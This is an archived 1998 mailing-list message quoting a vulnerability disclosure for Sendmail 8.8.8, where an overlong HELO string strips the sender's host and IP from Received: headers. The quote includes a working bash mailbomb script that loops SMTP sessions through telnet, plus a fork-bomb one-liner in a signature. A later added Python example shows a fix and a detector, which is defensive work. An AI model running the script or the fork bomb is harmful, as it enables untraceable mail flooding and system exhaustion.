Seems like MS Exchange Internet Mail Service 5.5 is vulnerable too.

--
"BSD code sucks. Of course, everything else sucks far more."
 - Theo de Raadt (OpenBSD President)

> -----Original Message-----
> From: Michał Zalewski <lcamtufat_private>
> To: infoat_private <infoat_private>
> Date: 10 January 1998 12:28
> Subject: Sendmail 8.8.8 (qmail?) HELO hole.
>
>
> Here's a brief description of a Sendmail (qmail) hole I found
> recently:
>
> When someone mailbombs you, or tries to send fakemail, spam, etc.,
> sendmail normally attaches the sender's host name and its address
> to the outgoing message:
>
> --
> >From spamat_private Mon Jan 5 22:08:21 1998
> Received: from spammer (marcat_private [150.129.84.5])
>         by myhost.com (8.8.8/8.8.8) with SMTP id WAA00376
>         for lcamtuf; Mon, 5 Jan 1998 22:07:54 +0100
> Date: Mon, 5 Jan 1998 22:07:54 +0100
> From: spamat_private
> Message-Id: <3.14159665@pi>
>
> MAILBOOM!!!
> --
>
> That's perfect - now you know who is responsible for that annoying
> junk in your mailbox: "Received: from spammer (marcat_private
> [150.129.84.5])". Nothing easier...
> But I found a small hole which allows a user to hide their identity
> and send mails anonymously. The only thing you should do is to
> pass a HELO string longer than approx. 1024 B - the sender's location and
> other very useful information will be cropped!!! Message
> headers should become uninteresting. Sometimes the sender
> may become quite untraceable (but not always, if it's possible
> to obtain logs from the machine which has been used to send):
>
> --
> >From spamat_private Mon Jan 5 22:09:05 1998
> Received: from xxxxxxxxxxxxxx... [a lot of 'x's] ...xxxx
> Date: Mon, 5 Jan 1998 22:08:52 +0100
> From: spamat_private
> Message-Id: <3.14159665@pi>
>
> MAILBOOM!!! Now guess who am I...
> --
>
>
> Here's a simple example of Sendmail's HELO hole usage. Note, this
> script has been written ONLY to show how easy it may be to send
> fakemails and mailbombs with the cooperation of Sendmail ;) The script is
> very slow and restricted in many ways, but explains the problem
> well (note, some non-Berkeley daemons are also affected,
> probably Qmail?):
>
> -- EXPLOIT CODE --
> #!/bin/bash
> TMPDIR=/tmp/`whoami`
> PLIK=$TMPDIR/.safe
> TIMEOUT=2
> LIMIT=10
> MAX=20
>
> echo
> echo "SafeBomb 1.02b -- sendmail HELO hole usage example"
> echo "Author: Michal Zalewski <lcamtufat_private>"
> echo
>
> if [ "$4" = "" ]; then
>   echo "USAGE: $0 msgfile address server sender"
>   echo
>   echo "  msgfile - file to send as a message body"
>   echo "  address - address of lucky recipient"
>   echo "  server  - outgoing smtp server w/sendmail"
>   echo "  sender  - introduce yourself"
>   echo
>   echo "WARNING: For educational use ONLY. Mailbombing is illegal."
>   echo "Think twice BEFORE you use this program in any way. Also,"
>   echo "I've never said this program is 100% safe nor bug-free."
>   echo
>   sleep 1
>   exit 0
> fi
>
> if [ ! -f $1 ]; then
>   echo "Message file not found."
>   echo
>   exit 0
> fi
>
> echo -n "Preparing message..."
> mkdir $TMPDIR &>/dev/null
> chmod 700 $TMPDIR
> echo "echo \"helo
> _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb
> omb__safebomb__safebomb__safebomb__safebomb__sa
> febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
> __safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf
> ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_
> _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe
> bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__
> safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb
> omb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__s
> afebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebo
> mb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa
> febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebom
> b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf
> ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
> b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf
> ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
> __safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe
> bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_
> _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb
> omb_\"" >$PLIK
> echo "echo \"mail from: \\\"$4\\\"\"" >>$PLIK
> echo "echo \"rcpt to: $2\"" >>$PLIK
> echo "echo \"data\"" >>$PLIK
> echo "cat <<__qniec__" >>$PLIK
> cat $1 >>$PLIK
> echo "__qniec__" >>$PLIK
> echo "echo \".\"" >>$PLIK
> echo "echo \"quit\"" >>$PLIK
> echo "sleep $TIMEOUT" >>$PLIK
> chmod +x $PLIK
> echo "OK"
>
> echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z to abort."
> SENT=0
>
> while [ -f $1 ]; do
>   $PLIK|telnet $3 25 &>/dev/null &
>   let SENT=SENT+1
>   echo -ne "Sent: $SENT\b\b\b\b\b\b\b\b\b\b\b\b\b"
>   CONNECTED=`ps|grep -c "telnet $3"`
>   if [ "$LIMIT" -le "$CONNECTED" ]; then
>     while [ "$LIMIT" -le "$CONNECTED" ]; do
>       sleep 1
>     done
>   fi
>   if [ "$SENT" -ge "$MAX" ]; then
>     echo "It's just an example, sorry."
>     echo
>     exit 0
>   fi
> done
> -- EOF --
>
> Suggested fix: insert an additional length limit into the HELO/EHLO
> parameter scanning routine OR disable AllowBogusHELO (but it
> may cause serious trouble). I have no 8.8.8 sources at the
> moment, so excuse me if it's unclear.
>
> PS:
>
> --
> From: Gregory Neil Shapiro <sendmail+gshapiroat_private>
>
> I was able to reproduce the header problem by lengthening the HELO string
> in your script.
>
> [...]
>
> This will be fixed in sendmail 8.9.
> --
>
> _______________________________________________________________________
> Michał Zalewski [tel 9690] | finger 4 PGP [lcamtufat_private]
> To iterate is human, to recurse divine [P. Deutsch]
> =--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] ---------=
>
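The symptom in the quoted post (an overlong HELO pushing the "(name [ip])" part out of the Received: header) and the suggested fix (a length limit on the HELO/EHLO parameter before it is used) can both be shown in a small receiver-side model. The following is an added example written for this archive page; it is not code from the original post and not sendmail's implementation. The 255-octet bound (taken from the RFC 1123 domain-name limit), the 1024-byte buffer used to model the reported crop, and all function names are assumptions; the sample header values are the ones printed in the post. It also includes a check a postmaster could run over spooled mail or logs to spot Received: lines that have lost their peer identity.

```python
"""Bounded HELO handling for an SMTP receiver, plus a check for the symptom.

Added example for this thread; not code from the original post and not
sendmail's own implementation. MAX_HELO_LEN is an assumed bound following
RFC 1123's 255-octet domain-name limit; HEADER_BUF is a constructed
stand-in for the fixed-size header buffer the reported crop implies.
"""
import re

MAX_HELO_LEN = 255   # assumed bound; the post only reports the crop at "approx. 1024 B"
HEADER_BUF = 1024    # constructed: size of the fixed buffer in the vulnerable model

# hostname or address-literal, the two forms an HELO/EHLO parameter may take
HOSTNAME_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.\-]*[A-Za-z0-9])?|\[[0-9.]+\]")
# "(name [a.b.c.d])" as the receiving MTA writes it from the socket peer
PEER_RE = re.compile(r"\(([^\s()]+)\s+\[(\d{1,3}(?:\.\d{1,3}){3})\]\)")


def format_received(helo, peer_name, peer_ip, my_host, smtp_id, date):
    """Header text as the receiving MTA writes it, before any buffer limit."""
    return (f"Received: from {helo} ({peer_name} [{peer_ip}]) "
            f"by {my_host} with SMTP id {smtp_id}; {date}")


def vulnerable_received(helo, peer_name, peer_ip, my_host, smtp_id, date):
    """Model of the reported behaviour: the HELO parameter is accepted at any
    length and the finished header is cut to a fixed buffer, so a long HELO
    pushes the peer's '(name [ip])' past the end of the header."""
    return format_received(helo, peer_name, peer_ip, my_host, smtp_id, date)[:HEADER_BUF]


def check_helo(param, my_host):
    """Bound and validate the HELO/EHLO parameter before it is used anywhere.
    Returns (accepted, smtp_reply). Rejecting beats truncating: a truncated
    parameter is still entirely chosen by the client."""
    if len(param) > MAX_HELO_LEN:
        return False, "501 5.5.4 HELO/EHLO parameter too long"
    if not HOSTNAME_RE.fullmatch(param):
        return False, "501 5.5.4 Invalid HELO/EHLO parameter"
    return True, f"250 {my_host}"


def hardened_received(helo, peer_name, peer_ip, my_host, smtp_id, date):
    """Peer identity comes from the socket, never from the client. A HELO
    parameter that fails check_helo() is recorded as 'unknown' rather than
    being allowed to displace the peer information."""
    accepted, _ = check_helo(helo, my_host)
    if not accepted:
        helo = "unknown"
    return format_received(helo, peer_name, peer_ip, my_host, smtp_id, date)


def received_missing_peer(header):
    """Detection for mail already in the spool or in logs: a Received: line
    written by this MTA without a '(name [ip])' group has lost its peer
    identity, which is the symptom shown in the post."""
    return header.startswith("Received:") and PEER_RE.search(header) is None


def demo():
    """Run the vulnerable and hardened models side by side on the post's values."""
    peer = dict(peer_name="marcat_private", peer_ip="150.129.84.5",
                my_host="myhost.com", smtp_id="WAA00376",
                date="Mon, 5 Jan 1998 22:07:54 +0100")
    long_helo = "x" * 1100   # constructed; longer than the ~1024 B the post reports
    return {
        "short_vulnerable_ok": not received_missing_peer(vulnerable_received("spammer", **peer)),
        "long_vulnerable_lost": received_missing_peer(vulnerable_received(long_helo, **peer)),
        "long_hardened_kept": not received_missing_peer(hardened_received(long_helo, **peer)),
        "long_helo_rejected": check_helo(long_helo, "myhost.com")[0] is False,
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'PASS' if ok else 'FAIL'}")
```

The design point is the ordering: the peer's name and address are taken from the connection and formatted into the header regardless of what the client sent, and the client-supplied parameter is bounded and validated before it reaches the header writer, so no HELO length can change what the Received: line records about the connecting host. `received_missing_peer` is the corresponding detection: a locally written Received: line without the bracketed address group is the trace the post shows and is worth alerting on.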
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:55:02 PDT